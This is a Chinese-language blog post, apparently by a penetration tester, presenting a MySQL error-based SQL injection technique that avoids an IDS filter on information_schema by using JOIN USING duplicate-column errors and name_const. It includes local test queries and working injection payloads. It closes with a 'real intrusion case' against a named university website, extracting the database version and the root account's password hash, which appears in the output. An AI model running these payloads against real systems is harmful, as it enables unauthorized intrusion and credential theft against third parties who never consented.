原来做渗透的时候，遇到过一个站，IDS过滤了information_schema，导致后来我没有搞定，前天看文章，发现一个绕过的方法，本地测试了下，也和月牛讨论了下，最后在月牛的帮助下，把语句都构造好了，原来那个点，回去再看，也就搞定了，后来被当哥把方法给放出来了，那就公布吧。

1.本地构造测试表

mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)

mysql> insert into users value(1,’mickey’,’827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)

mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)

2.暴列名

mysql> select * from (select * from users as a  join news as b) as c;
ERROR 1060 (42S21): Duplicate column name ‘id’

mysql> select * from (select * from users a join users b using(id)) c;
ERROR 1060 (42S21): Duplicate column name ‘name’
mysql> select * from (select * from users a join users b using(id,name)) c;
ERROR 1060 (42S21): Duplicate column name ‘passwd’
mysql> select * from (select * from users a join users b using(id,name,passwd)) c;
+——+——–+———————————-+
| id   | name   | passwd                           |
+——+——–+———————————-+
|    1 | mickey | 827ccb0eea8a706c4c34a16891f84e7b |
+——+——–+———————————-+
1 row in set (0.00 sec)

mysql> select * from (select * from news a join news b using(id)) as c;
ERROR 1060 (42S21): Duplicate column name ‘is_admin’
mysql> select * from (select * from news a join news b using(id,is_admin)) as c;
ERROR 1060 (42S21): Duplicate column name ‘title’
mysql> select * from (select * from news a join news b using(id,is_admin,title)) as c;
ERROR 1060 (42S21): Duplicate column name ‘date’
mysql> select * from (select * from news a join news b using(id,is_admin,title,date)) as c;
+———-+——+————–+————+
| is_admin | id   | title        | date       |
+———-+——+————–+————+
|        1 |    1 | hello,mickey | 2010-05-08 |
+———-+——+————–+————+
1 row in set (0.00 sec)

3.暴字段值 （这个语句是月牛想出来的）

研究出来的暴制语句
select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin)
,’fuck’)) a join (select name_const((select group_concat(concat(uid,0x7c,pwd)) from admin),’fuck’)) b)c);

运用：
mysql> select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const(
(select group_concat(concat(uid,0x7c,pwd)) from admin),’fuck’)) a
join (select name_const((select group_concat(concat(uid,0x7c,pwd)) fromadmin),
‘fuck’)) b)c);
ERROR 1060 (42S21): Duplicate column name ‘ylbhz|fuck,mickey|fucked’
mysql>

mysql> select * from cms_votes where vid=1 and exists
(select * from (select * from (select name_const(@@version,0))
a join (select name_const(@@version,0)) b)c);
ERROR 1060 (42S21): Duplicate column name ’5.0.45-community-nt’

4.实际入侵案例

http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19

&cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)

Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’

http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&

sid=19&cid=261+and+exists(select*from+(select*from(
select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))a+join+
(select+name_const((select+concat(user,password)+from+mysql.user+limit+0,1),0))b)c)
Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

最后多谢月牛的指导与讨论。